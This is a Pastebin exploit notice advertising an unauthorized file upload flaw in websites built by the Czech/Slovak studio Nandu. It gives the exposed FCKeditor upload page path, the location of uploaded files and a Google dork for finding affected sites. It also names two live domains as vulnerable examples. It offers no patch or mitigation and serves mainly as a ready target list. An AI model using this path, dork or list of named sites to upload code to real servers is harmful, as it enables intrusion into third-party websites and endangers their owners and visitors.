Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : Schwabe Slovakia WebDesign Studio Nandu Unauthorized File Insertion
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 21/05/2019
- # Vendor Homepage : nandu.cz
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : intext:Copyright © 2012 Schwabe Slovakia s.r.o., webdesign studio nandu
- # Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ####################################################################
- # Description About Software :
- *****************************
- Schwabe Slovakia Studio Nandu is a Web Design Company in Czech Republic.
- ####################################################################
- # Impact :
- ***********
- Schwabe Slovakia Studio Nandu is prone to a vulnerability that lets attackers
- upload arbitrary files because it fails to adequately sanitize user-supplied input.
- An attacker can exploit this vulnerability to upload arbitrary code and execute
- it in the context of the webserver process. This may facilitate unauthorized access
- or privilege escalation; other attacks are also possible.
- ####################################################################
- # Arbitrary File Upload / Unauthorized File Insert Exploit :
- **************************************************
- /admin/fckeditor/editor/filemanager/connectors/uploadtest.html
- Directory File Path :
- *******************
- /_data_editor/[YOURFILENAME].txt .jpg .gif .png
- ####################################################################
- # Example Vulnerable Sites :
- ************************
- [+] sinupret.sk/admin/fckeditor/editor/filemanager/connectors/uploadtest.html
- [+] kaloba.sk/admin/fckeditor/editor/filemanager/connectors/uploadtest.html
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement